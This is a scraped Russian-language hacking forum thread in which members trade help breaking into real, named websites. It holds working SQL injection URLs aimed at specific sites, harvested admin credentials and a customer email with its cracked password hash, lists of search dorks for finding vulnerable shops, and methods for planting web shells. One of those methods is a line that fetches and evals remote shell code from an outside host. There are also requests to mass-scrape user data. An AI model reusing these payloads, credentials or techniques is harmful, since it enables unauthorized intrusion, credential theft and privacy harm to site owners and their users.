узнал логин и пароЛЬ админа

name: redbox_admin

password: hooyinting

иду сюда

redbox.sg/login.php

ввожу данные, а мне пишет што непрвельный логин и пароль, почему?

qaz said:
ага, ок пойду почитаю,
ещо один вопрос,
узнал логин и пароЛЬ админа
name: redbox_admin
password: hooyinting
иду сюда
redbox.sg/login.php
ввожу данные, а мне пишет што непрвельный логин и пароль, почему?



патамушта гладиолус

Gorev said:
патамушта гладиолус


0_о а если чесно?

Есть шелл www.site.com захожу через него в базу msql, www.admin.site.com возможно ли залить шелл через msql

на сайт www.admin.site.com

Фараон said:
Заливка шелла через PhpMyAdmin (https://rdot.org/forum/showthread.php?t=347)


это понятно но у меня доступ к базе только через шелл(storm)

Извини, не понял вопрос (голова болит очень). В ПМ скинь, посмотрю.

Подскажите дорки для поиска шопов

кроме shop.php или buy.php

Keltos said:
Подскажите дорки для поиска шопов
кроме shop.php или buy.php


inurl:/catalog.php?act=1

inurl:cat=2

в гугле: интернет магазины

типа чето такого

inurl:"product"

inurl:"productid="

inurl:"proid="

Ну и я еще обычно юзаю filetypehp

А ваще гавно эти шопы.

Keltos said:
Подскажите дорки для поиска шопов
кроме shop.php или buy.php




Code:
".asp?bookID="
".asp?cart="
".asp?cartID="
".asp?catalogid="
".asp?category_list="
".asp?CategoryID="
".asp?catID="
".asp?cid="
".asp?code_no="
".asp?code="
".asp?designer="
".asp?framecode="
".asp?id="
".asp?idcategory="
".asp?idproduct="
".asp?intCatalogID="
".asp?intProdId="
".asp?item_id="
".asp?item="
".asp?itemID="
".asp?maingroup="
".asp?misc="
".asp?newsid="
".asp?order_id="
".asp?p="
".asp?pid="
".asp?ProdID="
".asp?product_id="
".asp?product="
".asp?productid="
".asp?showtopic="
".asp?Sku="
".asp?storeid="
".asp?style_id="
".asp?StyleID="
".asp?userID="
"about.asp?cartID="
"accinfo.asp?cartId="
"acclogin.asp?cartID="
"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
"cardinfo.asp?card="
"cart.asp?action="
"cart.asp?cart_id="
"cart.asp?id="
"cart_additem.asp?id="
"cart_validate.asp?id="
"cartadd.asp?id="
"cat.asp?iCat="
"catalog.asp"
"catalog.asp?CatalogID="
"catalog_item.asp?ID="
"catalog_main.asp?catid="
"category.asp"
"category.asp?catid="
"category_list.asp?id="
"categorydisplay.asp?catid="
"checkout.asp?cartid="
"checkout.asp?UserID="
"checkout_confirmed.asp?order_id="
"checkout1.asp?cartid="
"comersus_listCategoriesAndProducts.asp?idCategory ="
"comersus_optEmailToFriendForm.asp?idProduct="
"comersus_optReviewReadExec.asp?idProduct="
"comersus_viewItem.asp?idProduct="
"comments_form.asp?ID="
"contact.asp?cartId="
"content.asp?id="
"customerService.asp?TextID1="
"default.asp?catID="
"description.asp?bookid="
"details.asp?BookID="
"details.asp?Press_Release_ID="
"details.asp?Product_ID="
"details.asp?Service_ID="
"display_item.asp?id="
"displayproducts.asp"
"downloadTrial.asp?intProdID="
"emailproduct.asp?itemid="
"emailToFriend.asp?idProduct="
"events.asp?ID="
"faq.asp?cartID="
"faq_list.asp?id="
"faqs.asp?id="
"feedback.asp?title="
"freedownload.asp?bookid="
"fullDisplay.asp?item="
"getbook.asp?bookid="
"GetItems.asp?itemid="
"giftDetail.asp?id="
"help.asp?CartId="
"home.asp?id="
"index.asp?cart="
"index.asp?cartID="
"index.asp?ID="
"info.asp?ID="
"item.asp?eid="
"item.asp?item_id="
"item.asp?itemid="
"item.asp?model="
"item.asp?prodtype="
"item.asp?shopcd="
"item_details.asp?catid="
"item_list.asp?maingroup"
"item_show.asp?code_no="
"itemDesc.asp?CartId="
"itemdetail.asp?item="
"itemdetails.asp?catalogid="
"learnmore.asp?cartID="
"links.asp?catid="
"list.asp?bookid="
"List.asp?CatID="
"listcategoriesandproducts.asp?idCategory="
"modline.asp?id="
"myaccount.asp?catid="
"news.asp?id="
"order.asp?BookID="
"order.asp?id="
"order.asp?item_ID="
"OrderForm.asp?Cart="
"page.asp?PartID="
"payment.asp?CartID="
"pdetail.asp?item_id="
"powersearch.asp?CartId="
"price.asp"
"privacy.asp?cartID="
"prodbycat.asp?intCatalogID="
"prodetails.asp?prodid="
"prodlist.asp?catid="
"product.asp?bookID="
"product.asp?intProdID="
"product_info.asp?item_id="
"productDetails.asp?idProduct="
"productDisplay.asp"
"productinfo.asp?item="
"productlist.asp?ViewType=Category&CategoryID= "
"productpage.asp"
"products.asp?ID="
"products.asp?keyword="
"products_category.asp?CategoryID="
"products_detail.asp?CategoryID="
"productsByCategory.asp?intCatalogID="
"prodView.asp?idProduct="
"promo.asp?id="
"promotion.asp?catid="
"pview.asp?Item="
"resellers.asp?idCategory="
"results.asp?cat="
"savecart.asp?CartId="
"search.asp?CartID="
"searchcat.asp?search_id="
"Select_Item.asp?id="
"Services.asp?ID="
"shippinginfo.asp?CartId="
"shop.asp?a="
"shop.asp?action="
"shop.asp?bookid="
"shop.asp?cartID="
"shop_details.asp?prodid="
"shopaddtocart.asp"
"shopaddtocart.asp?catalogid="
"shopbasket.asp?bookid="
"shopbycategory.asp?catid="
"shopcart.asp?title="
"shopcreatorder.asp"
"shopcurrency.asp?cid="
"shopdc.asp?bookid="
"shopdisplaycategories.asp"
"shopdisplayproduct.asp?catalogid="
"shopdisplayproducts.asp"
"shopexd.asp"
"shopexd.asp?catalogid="
"shopping_basket.asp?cartID="
"shopprojectlogin.asp"
"shopquery.asp?catalogid="
"shopremoveitem.asp?cartid="
"shopreviewadd.asp?id="
"shopreviewlist.asp?id="
"ShopSearch.asp?CategoryID="
"shoptellafriend.asp?id="
"shopthanks.asp"
"shopwelcome.asp?title="
"show_item.asp?id="
"show_item_details.asp?item_id="
"showbook.asp?bookid="
"showStore.asp?catID="
"shprodde.asp?SKU="
"specials.asp?id="
"store.asp?id="
"store_bycat.asp?id="
"store_listing.asp?id="
"Store_ViewProducts.asp?Cat="
"store-details.asp?id="
"storefront.asp?id="
"storefronts.asp?title="
"storeitem.asp?item="
"StoreRedirect.asp?ID="
"subcategories.asp?id="
"tek9.asp?"
"template.asp?Action=Item&pid="
"topic.asp?ID="
"tuangou.asp?bookid="
"type.asp?iType="
"updatebasket.asp?bookid="
"updates.asp?ID="
"view.asp?cid="
"view_cart.asp?title="
"view_detail.asp?ID="
"viewcart.asp?CartId="
"viewCart.asp?userID="
"viewCat_h.asp?idCategory="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID="
"WsPages.asp?ID="

redbox.sg/products.php?cat_id=-61+union+select+1,2,3,user_name,5,6,7,8,9,10,%2011 ,12,13,14,15,16,17,18+FROM+user--

redbox.sg/products.php?cat_id=-61+union+select+1,2,3,password,5,6,7,8,9,10,%2011, 12,13,14,15,16,17,18+FROM+user--

узнал логин и пароЛЬ админа

name: redbox_admin

password: hooyinting

иду сюда

redbox.sg/login.php

ввожу данные, а мне пишет што

непрвельный логин и пароль,

почему?

qaz said:
redbox.sg/products.php?cat_id=-61+union+select+1,2,3,user_name,5,6,7,8,9,10,%2011 ,12,13,14,15,16,17,18+FROM+user--
redbox.sg/products.php?cat_id=-61+union+select+1,2,3,password,5,6,7,8,9,10,%2011, 12,13,14,15,16,17,18+FROM+user--
узнал логин и пароЛЬ админа
name: redbox_admin
password: hooyinting
иду сюда
redbox.sg/login.php
ввожу данные, а мне пишет што
непрвельный логин и пароль,
почему?


qaz

вы могли бы заметить внизу есть кнопочка "Register a new account"

тебе это ничего не подсказывает?

это не форма авторизации для администраторов, в следующий раз будте внимательнее, чтоб не флудить в теме.

Как здесь крутить дальше?

http://www.georgiaencyclopedia.org/nge/Article.jsp?id=h-3434'+order+by+1+--+

FlaktW said:
Как здесь крутить дальше?
http://www.georgiaencyclopedia.org/nge/Article.jsp?id=h-3434'+order+by+1+--+


http://www.georgiaencyclopedia.org/nge/Article.jsp?id=h-3434'+and+to_char(11)=to_char(1)||to_char(1)+--+

Oracle

http://www.georgiaencyclopedia.org/nge/Article.jsp?id=h-3434'+union+select+null+from+sys.dual+--+

дальше сам

qaz said:
redbox.sg/products.php?cat_id=-61+union+select+1,2,3,user_name,5,6,7,8,9,10,%2011 ,12,13,14,15,16,17,18+FROM+user--
redbox.sg/products.php?cat_id=-61+union+select+1,2,3,password,5,6,7,8,9,10,%2011, 12,13,14,15,16,17,18+FROM+user--
узнал логин и пароЛЬ админа
name: redbox_admin
password: hooyinting
иду сюда
redbox.sg/login.php
ввожу данные, а мне пишет што
непрвельный логин и пароль,
почему?


Я нашел на ссайте другую таблу от оскоммерса, где нашлись мыла и хеши пассов, в т.ч:


flowers@redbox.com.sg:5f81060d6782d3fec8471911e5ed 3077


хеш разлагается на 12345. Вбей мыло и пасс на твоей странице login.php и ты войдешь в панель клиента, но там ниче нет интересного.

Админку не нашел и таблы с админами в базе оскомерца нет, там ваще все странно.

Помогите пожалуйсто расскурутить blind sql на joomla

http://194.28.132.13/index.php?option=com_aardvertiser&cat_name=Equipment'+AND+'1'='1&task=view

Sc0rpi0n said:
Помогите пожалуйсто расскурутить blind sql на joomla
http://194.28.132.13/index.php?option=com_aardvertiser&cat_name=Equipment'+AND+'1'='1&task=view



Ваши вопросы по уязвимостям. Где ты узрел слова- помощь в раскрутке скулей?

Sc0rpi0n said:
Помогите пожалуйсто расскурутить blind sql на joomla
http://194.28.132.13/index.php?option=com_aardvertiser&cat_name=Equipment'+AND+'1'='1&task=view


http://194.28.132.13/index.php?option=com_aardvertiser&task=view&cat_name=Equipment'+and+1=0+union+select+1,2,3,4,5 ,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20%2 3

Кто-нибудь заливал шелл в форуме wowbb через админку?

Есть возможность restore bd

и выполнить sql команды!

у кого есть опыт можете подсказать?

I love this game said:
Кто-нибудь заливал шелл в форуме wowbb через админку?

Есть возможность restore bd

и выполнить sql команды!

у кого есть опыт можете подсказать?


ну попробуй залить через sql команду. если есть права

Чета не догнал я, как тут крутить, казалось бы, SQLi с выводом ошибок.

http://injoyv[GOOGLE fuck]ideos.com/product.php?proid=85'

Делал GROUP+BY'ем, ну выдавил, что 3 колонки, оно не подошло, ладно, думаю, пофиг, стал нянчить SELECT'ом и вот до чего дошел:


Code:
UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ,50,51,52,53,54,55,56

При этом значении выдает не несоответствие числа колонок, а другое:


Unknown column 'Viewable' in 'field list'


Причем при подстановке +--+ в конец ситуация меняется.

Че это и как быть дальше???

Konqi said:
ну попробуй залить через sql команду. если есть права


дело в том что просто знаний не хватает)))

хотел по примеру залить как на phpbb


Code:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2;

но не могу понять

вот это


Code:
user_sig_bbcode_uid='(.+)/e\0'

fl00der said:
Чета не догнал я, как тут крутить, казалось бы, SQLi с выводом ошибок.
http://injoyv[GOOGLE fuck]ideos.com/product.php?proid=85'
Делал GROUP+BY'ем, ну выдавил, что 3 колонки, оно не подошло, ладно, думаю, пофиг, стал нянчить SELECT'ом и вот до чего дошел:

Code:
UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ,50,51,52,53,54,55,56

При этом значении выдает не несоответствие числа колонок, а другое:
Причем при подстановке +--+ в конец ситуация меняется.
Че это и как быть дальше???


колонок 3 как ты и сказал...но вывода нет..

а кто сказал что должен быть вывод? крути как слепую..

version: 4.1.20

user: injoyuser@localhost

database:injoydb

табла admin, user есть..дальше сам..и впредь убирай ядовитые цвета из постов..глаза болят..

fl00der said:
Чета не догнал я, как тут крутить, казалось бы, SQLi с выводом ошибок.
http://injoyv[GOOGLE fuck]ideos.com/product.php?proid=85'
Делал GROUP+BY'ем, ну выдавил, что 3 колонки, оно не подошло, ладно, думаю, пофиг, стал нянчить SELECT'ом и вот до чего дошел:

Code:
UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ,50,51,52,53,54,55,56

При этом значении выдает не несоответствие числа колонок, а другое:
Причем при подстановке +--+ в конец ситуация меняется.
Че это и как быть дальше???


http://injoyvideos.com/product.php?proid=-85%20or%201%20group%20by%20concat((select%20versio n()),floor(rand(0)*2))%20having%20min(0)%20or%201% 20--%201

Надеюсь ты знаешь, где именно пробелы убрать?

I love this game said:


дело в том что просто знаний не хватает)))

хотел по примеру залить как на phpbb


Code:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2;

но не могу понять

вот это


Code:
user_sig_bbcode_uid='(.+)/e\0'



исполнение кода

http://www.wowbb.com/admin_demo/admin.php?advanced=3

вот в такой админке можно как то залить или нет?

Пытаюсь залить шелл через into outfile, файл в директории создается, он он пустой

пробывал поразному

select '123' into outfile '/a/a.txt'

и через terminated by, результат все тотже - файл заливается но он пустой.

есть идеи в чем может быть проблема?

попробуй в другую диру и


Code:
select 0x31 into outfile '/web/www/1.txt';

пробывал конечно.. все также.

kongi tnx

ALIM

это хеш а не плавный пасс..

Здравствуйте. Дайте пожалуйсто пример исходного кода скрипта, где есть традиционая блинд sql инъекция. Если нет, тонаьросате пожалуйсто. Надо обучиться в дом.условиях

Sc0rpi0n said:
Здравствуйте. Дайте пожалуйсто пример исходного кода скрипта, где есть традиционая
блинд
sql инъекция. Если нет, тонаьросате пожалуйсто. Надо обучиться в дом.условиях




PHP:

Sc0rpi0n said:
Здравствуйте. Дайте пожалуйсто пример исходного кода скрипта, где есть традиционая
блинд
sql инъекция. Если нет, тонаьросате пожалуйсто. Надо обучиться в дом.условиях




PHP:

захожу на сайт:

ftp://xxxxxxxxxx.se

там 2 файла:

.bashrc

.bash_profile

в которых ничего особенного нет, выше не поднимается, других файлов и папок нет

создаю папку с правами 777, шелл заливается

ftp://xxxxxxxxxx.se/1/test.php не выполняется открывается как текстовый файл

http://xxxxxxxxx.se/1/test.php

нет такого файла

Есть ли тут возможность заливки шелла?

На сайте есть скуль, через order by смотрю сколько полей их 3!

Через union+select подставляю 1,2,3--

выдает такой вот текст:

Query failed: The used SELECT statements have a different number of columns

как такое может быть и как это обойти?

I love this game said:
На сайте есть скуль, через order by смотрю сколько полей их 3!

Через union+select подставляю 1,2,3--

выдает такой вот текст:

Query failed: The used SELECT statements have a different number of columns

как такое может быть и как это обойти?


Может переменная в несколько запросов подставляется,крути как слепую.

Короче, хочу разобраться в написание скрипта эксплатирующего blind sql inj

методом " Бинарный (двоичный) поиск нужного символа"

токо я не допонимаю как написать реализацию (тут не оч. понтяно /showpost.php?p=1258161&postcount=1)

дайте плиз ссыль на наглядный пример того метода

там как раз таки довольно хорошо написано, ну а если ты разобраться не можешь то о каком скрипте может быть речь?

ALIM said:
захожу на сайт:
ftp://xxxxxxxxxx.se
там 2 файла:
.bashrc
.bash_profile
в которых ничего особенного нет, выше не поднимается, других файлов и папок нет
создаю папку с правами 777, шелл заливается
ftp://xxxxxxxxxx.se/1/test.php не выполняется открывается как текстовый файл
http://xxxxxxxxx.se/1/test.php
нет такого файла
Есть ли тут возможность заливки шелла?


Твой ФТП, скорей всего, недоступен из веба да и все.

Единственный путь- это найти на самом сайте локальный инклюд и найти, куда ты льешь шелл и заинклюдить его. Скинь лучше линк на сайт в теме.

Вопрос

http://localhost/xxx.php?p=1 профиль первого юзера

http://localhost/xxx.php?p=2 профиль второго юзера

и т.д.

В профиле указан город, мыло, имя, пол и т.д.

юзеров более 2 млн. Как спарсить на автомате инфу обо всех юзерах?

Чтобы дамп был вида:

мыло, пол, город

мыло, пол, город

мыло, пол, город

Буду рад любой помощи.

Залил веб шелл, пробую обратиться к нему - получаю пустую страницу (то что он по этому адресу - 100%). Простейшие же php файлы типа исполняются нормально. Что бы это могло быть?

iv.

Без линка причину тебе врятле скажут сразу же,могут быть только догадки.А то что он залился,это не факт,то что исполняется один код ето хорошо.

Попробуй сделать следующее:

Попробуй вставить в шаблон (или куда ты там впихиваешь пхп код) следующий код:

Затем проверь:

site.com/shablon.php?e=phpinfo();

Если все окей и директива url_fopen = on то:

site.com/shablon.php?e=eval(file_get_contents('http://tvoisite.com/shelleng.txt'));

Убери только из шелленга и залей на какой-нибудь фрихост с расширением тхт,пароль также советую убрать,т.к. шелл не заливается на сервак.

iv. said:
Залил веб шелл, пробую обратиться к нему - получаю пустую страницу (то что он по этому адресу - 100%). Простейшие же php файлы типа исполняются нормально. Что бы это могло быть?



Шелл, наверное, загзипован, а на сервере не стоит это расширение. Попробуй другой шелл, без gzinflate() или распакуй его.

Кто может подсказать как из Acunetix Web Vulnerability Scanner снимать найденные уязвимости? сайт сканирован, нашел несколько SQL иньексии, но не показывает URL:

http://i035.radikal.ru/1012/43/63243ba15c6a.jpg

вот не понимаю как отсюда эксплуатировать это делол.

B1t.exe said:
Кто может подсказать как из
Acunetix Web Vulnerability Scanner
снимать найденные уязвимости? сайт сканирован, нашел несколько SQL иньексии, но не показывает URL:
http://i035.radikal.ru/1012/43/63243ba15c6a.jpg
вот не понимаю как отсюда эксплуатировать это делол.


давно не пользуюсь сканерами для багов, но если по памяти то , нажми на багу (скулю) с правой стороны проги eсть окошко где будет уязвимый скрипт и метод (пост или гет) ..

Подскажите с залитием шелла в булку

Версия 3.8.5

сделал плагин с шеллом

/forum/faq.php?cmd=dir работает

а phpinfo и остальное не хочет, в чем проблема!

И кто знает еще способы залить шелл в этой версии!

I love this game said:
Подскажите с залитием шелла в булку
Версия 3.8.5
сделал плагин с шеллом
/forum/faq.php?cmd=dir работает
а phpinfo и остальное не хочет, в чем проблема!
И кто знает еще способы залить шелл в этой версии!


напиши мне в пм, помогу

Lijzer said:
Вопрос
http://localhost/xxx.php?p=1 профиль первого юзера
http://localhost/xxx.php?p=2 профиль второго юзера
и т.д.
В профиле указан город, мыло, имя, пол и т.д.
юзеров более 2 млн. Как спарсить на автомате инфу обо всех юзерах?
Чтобы дамп был вида:
мыло, пол, город
мыло, пол, город
мыло, пол, город
Буду рад любой помощи.


Это оффтоп.

Надо писать парсер, который распарсит страницы сайта.

Gorev

А там с права я показал вам пол скрина и вот и другой часть:

http://s61.radikal.ru/i171/1012/85/e2adf18ea9cb.jpg

вот непонятно что где и как ...

B1t.exe

параметр PageId уязвим, данные передаются методом POST, что не понятно?

B1t.exe said:
Gorev
А там с права я показал вам пол скрина и вот и другой часть:
http://s61.radikal.ru/i171/1012/85/e2adf18ea9cb.jpg
вот непонятно что где и как ...


твой скрин и дал ответ на твой вопрос, у меня скрины не грузились и я не видел что на них, только сейчас и увидел..

попробуй тулзу от пашкелы она c пост методом работает..

че то не понял.. т.е. эта прога так и не показывает уязвимые ссылки?

тогда зачем такая громозкая программа и такая цена?

А что за тулза от пашкелы?

B1t.exe said:
че то не понял.. т.е. эта прога так и не показывает уязвимые ссылки?
тогда зачем такая громозкая программа и такая цена?
А что за тулза от пашкелы?


Уязвимость в POST запросе, не в GET, штатными средствами браузера ты через адресную строку не передашь.

+1 к вопросу про Пашкелу.

fl00der said:
Уязвимость в POST запросе, не в GET, штатными средствами браузера ты через адресную строку не передашь.
+1 к вопросу про Пашкелу.



/thread148915-toolza.html

I love this game said:
Подскажите с залитием шелла в булку
Версия 3.8.5
сделал плагин с шеллом
/forum/faq.php?cmd=dir работает
а phpinfo и остальное не хочет, в чем проблема!
И кто знает еще способы залить шелл в этой версии!


дай угадаю, в faq.php ты засунул код system($_GET['cmd']) а ОС сервера на котором стоит атакуемый сайт Windows

Используй какие-нибудь callback функции или же просто eval, для выполнения своего php кода.

Expl0ited said:
дай угадаю, в faq.php ты засунул код system($_GET['cmd']) а ОС сервера на котором стоит атакуемый сайт Windows
Используй какие-нибудь callback функции или же просто eval, для выполнения своего php кода.


не угaдал...он все правильно туда ставил и ось там была *никс...просто сайт раньше ломали и админ кое что в настройках сервера подправил...но хитрым способом это можно было обойти и в итоге шелл был залит.

Gorev said:
не угaдал...он все правильно туда ставил и ось там была *никс...просто сайт раньше ломали и админ кое что в настройках сервера подправил...но хитрым способом это можно было обойти и в итоге шелл был залит.


тогда что это за странная конструкция faq.php?cmd=dir?

Народ, подскажите это PHP-inj или фрейм http://www.prodisney.ru/index.php?page=index.php и если это фрейм то что должно было быть при PHP-inj?

Samael91 said:
Народ, подскажите это PHP-inj или фрейм http://www.prodisney.ru/index.php?page=index.php и если это фрейм то что должно было быть при PHP-inj?


Смотрим сурс:


Code:



Фрейм - страница вставлена во фрейм

Читалка - видешь сурс страница, в т.ч. и PHP.

PHP-inject - это include('page.php'); PHP выучи хотябы а потом уже хацкери =\\

Expl0ited said:
тогда что это за странная конструкция faq.php?cmd=
dir
?


человек не особо разбирается в никс коммандах....

Не получается вывести версию БД.

http://www.vyo.org/index.php?events/action/show/id/event/yr/2010/mon/-12+union+select+1,2,version(),4,5,6,7,8,9+--+

FlaktW said:
Не получается вывести версию БД.
http://www.vyo.org/index.php?events/action/show/id/event/yr/2010/mon/-12+union+select+1,2,version(),4,5,6,7,8,9+--+




version: 5.0.54-log

user: vyoadb@67.199.10.33

database: dbvyoa

писать в личку и дальше спрашивать как я получил это не следует..Я УГАДАЛ !!!

ЗЫ. Вопросы по раскрутке уже задолбали

http://engr.oregonstate.edu/oregonstater/citation.php?id=290+and+1=0+union+select+1,2,3,4,5 ,6,column_name,8,9,10,11 FROM INFORMATION_SCHEMA.columns where table_name='USER_PRIVILEGES' --

как будет правильно составить запрос?

toX1k

могически_кавычке = on

хекс юзай и почитай маны

http://engr.oregonstate.edu/oregonstater/citation.php?id=290+and+1=0+union+select+1,2,3,4,5 ,6,column_name,8,9,10,11+FROM+INFORMATION_SCHEMA.c olumns+where+table_name=0x555345525F50524956494C45 474553--

P.S. пробелы убери

я так и подумал что кавычки фильтруются ('), аналога заменяющего их не нашёл

сначала char() хотел заюзать, после передумал

Залил шелл, захожу на него, но не отображается полностью

http://s44.radikal.ru/i106/1012/b4/d37ba95db3cet.jpg (http://radikal.ru/F/s44.radikal.ru/i106/1012/b4/d37ba95db3ce.jpg.html)

I love this game said:
Залил шелл, захожу на него, но не отображается полностью
http://s44.radikal.ru/i106/1012/b4/d37ba95db3cet.jpg (http://radikal.ru/F/s44.radikal.ru/i106/1012/b4/d37ba95db3ce.jpg.html)


Залей другой шелл, видимо в настройках пхп на сервере отключена/неработает функция получения списка файлов в каталоге или приведи код шелла здесь

Пробовал c99,wso, и n3t

залил phpinfo(); все норм отобразилось!

I love this game said:
Пробовал c99,wso, и n3t
залил phpinfo(); все норм отобразилось!


Короче в связи с тем что ты очень мало даешь информации, остается только вариант угадать что у тебя случилось, если представить что на том сервере стоит BSD система, то естественно работать не будет, потому что c99 работает с realpath() которая не совместима с БСД системами. А вообще можно залить шелл например написанный на perl

Посоветуйте шелл под БСД кстати.


I love this game said:
Пробовал c99,wso, и n3t
залил phpinfo(); все норм отобразилось!


Uname?

Кстати, шелл заливал не на Мастерхост?

Server software: Apache/2.2

Loaded Apache modules: core, itk, http_core, mod_so, mod_auth_basic, mod_authn_file, mod_authz_host, mod_authz_user, mod_authz_groupfile, mod_authz_default, mod_include, mod_log_config, mod_env, mod_expires, mod_headers, mod_setenvif, mod_mime, mod_status, mod_autoindex, mod_negotiation, mod_dir, mod_alias, mod_rewrite, mod_actions, mod_unique_id, mod_auth_mysql, mod_deflate, mod_nogzip, mod_rpaf-2, mod_php5

Disabled PHP Functions: leak,posix_getpwuid,posix_getpwnam,posix_getgrid,p osix_getgrnam,posix_getgroups

cURL support: enabled

Supported databases: MySql (5.0.77), MSSQL, PostgreSQL

Readable /etc/passwd: yes [view]

Readable /etc/shadow: no

OS version: Linux version 2.6.32.21-grsec-6.mosso5.x86_64 (mockbuild@rpm-master.wc1.dfw1.stabletransit.com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Thu Oct 14 13:22:47 CDT 2010

Distr name:

Red Hat Enterprise Linux Server release 5.5 (Tikanga)

Kernel \r on an \m

Userful: gcc, cc, ld, make, php, tar, gzip, bzip2, nc, locate

Danger: iptables

Downloaders: wget, curl

I love this game said:
Server software: Apache/2.2
Loaded Apache modules: core, itk, http_core, mod_so, mod_auth_basic, mod_authn_file, mod_authz_host, mod_authz_user, mod_authz_groupfile, mod_authz_default, mod_include, mod_log_config, mod_env, mod_expires, mod_headers, mod_setenvif, mod_mime, mod_status, mod_autoindex, mod_negotiation, mod_dir, mod_alias, mod_rewrite, mod_actions, mod_unique_id, mod_auth_mysql, mod_deflate, mod_nogzip, mod_rpaf-2, mod_php5
Disabled PHP Functions: leak,posix_getpwuid,posix_getpwnam,posix_getgrid,p osix_getgrnam,posix_getgroups
cURL support: enabled
Supported databases: MySql (5.0.77), MSSQL, PostgreSQL
Readable /etc/passwd: yes [view]
Readable /etc/shadow: no
OS version: Linux version 2.6.32.21-grsec-6.mosso5.x86_64 (mockbuild@rpm-master.wc1.dfw1.stabletransit.com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Thu Oct 14 13:22:47 CDT 2010
Distr name:
Red Hat Enterprise Linux Server release 5.5 (Tikanga)
Kernel \r on an \m
Userful: gcc, cc, ld, make, php, tar, gzip, bzip2, nc, locate
Danger: iptables
Downloaders: wget, curl


вообщем так прям и не скажешь отчего не работает пхп шелл, залей перл шелл

А другие варианты есть какие-либо кроме perl шелла

кстати через console - > list dir

Отображает файлы и папки

попробуй print_r(scandir('полный_путь_до_кат алога'));

если выведет список дир, тогда переделывать шелл придется, или найти тот который использует scandir

выдало, как переделать?

ищи функцию в шелле которая отвечает за вывод содержимого каталога и измени на скандир

Спасибо за помощь, нагуглил что в r57 выводит все норм, действительно так и есть!

Вот сайт http://l2sd.ru/index.php?do=lineage&module=forget при логине любая буква и выдает Ошибка запроса (localhost, server):

SELECT * FROM `accounts_tmp` WHERE `login_tmp` = 'в' AND `active` = '1' LIMIT 1

1267, Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (cp1251_general_ci,COERCIBLE) for operation '='

можно ли как нибудь её раскрутить?

SnooPy said:
Вот сайт http://l2sd.ru/index.php?do=lineage&module=forget при логине любая буква и выдает Ошибка запроса (localhost, server):
SELECT * FROM `accounts_tmp` WHERE `login_tmp` = 'в' AND `active` = '1' LIMIT 1
1267, Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (cp1251_general_ci,COERCIBLE) for operation '='
можно ли как нибудь её раскрутить?


Посмотрел краем глаза,там крутить нечего.

Вот для примера введи туда английские буквы - ошибки нет,затем введи туда ковычку - ошибки нет,затем пробуй слеши с двойными ковычками - ошибок нет,зато как только русские символы вводишь появляется ошибко.Даже по самой ошибки можно было догадаться.

Вывод:ищи другие пути к сайту.

Здарвсвуйте, подкскадите как написать эксплоит на PHP для blind sql injection методом бинароного поиска, я полный брутом уже научился. Этот метод описан в статье /showthread.php?t=119047

там говорится


1) Берём диапазон всех возможных символов (для md5 - [0-9,a-f]), и сравниваем значение кода символа в БД с кодом символа, который мы передали в запросе. 2) Если код символа в БД больше чем код переданого символа, то на следующем шаге, в качестве диапазона возможных символов берём диапазон от того символа, с которым мы только что сравнивали значение в БД, до правой границы предыдущего диапазона, и идём на шаг 1. 3) Если код символа меньше, то берём диапазон от текущего символа до левой границы диапазона на предыдущем шаге, и идём на шаг 1. 4) Если символ не больше и не меньше, то мы как раз его и нашли.


но я не понимаю, как сравнивать значение кода символа в БД с кодом символа мы передали запросе. Подскажите мне пример SQL запроса для этого метода. Вот в полном бруте я использую вот этот


Code:
+AND+ASCII(SUBSTRING((SELECT+password+FROM+users+W HERE+id=1),$n,1))=".ord($char[$i])"+--+

Sc0rpi0n said:
Здарвсвуйте, подкскадите как написать эксплоит на PHP для blind sql injection методом бинароного поиска, я полный брутом уже научился. Этот метод описан в статье /showthread.php?t=119047
там говорится
но я не понимаю, как сравнивать значение кода символа в БД с кодом символа мы передали запросе. Подскажите мне пример SQL запроса для этого метода. Вот в полном бруте я использую вот этот

Code:
+AND+ASCII(SUBSTRING((SELECT+password+FROM+users+W HERE+id=1),$n,1))=".ord($char[$i])"+--+



Самое банальное, если у тебя в массиве $char хранятся символы от 0 до f, то ты берешь 2 переменные $mini=0 и $maxi=15

$i=round(($maxi-$mini)/2)

Делаешь запрос

[CODE]
Code:
+AND+ASCII(SUBSTRING((SELECT+password+FROM+users+W HERE+id=1),$n,1))

Вопрос по иньекции и заливке шелла в shop-script

Нашел в магазине иньекцию, движок shop-script premium. Уязвимость была ранее описана на ачате как Blind но сервер выводит ошибки так что раскрутил как error-based.

Столкнулся с проблемой: иньекция не выводила ничего при селекте из любой таблицы, т.е. как будто мой селект возвращал пустой результат.

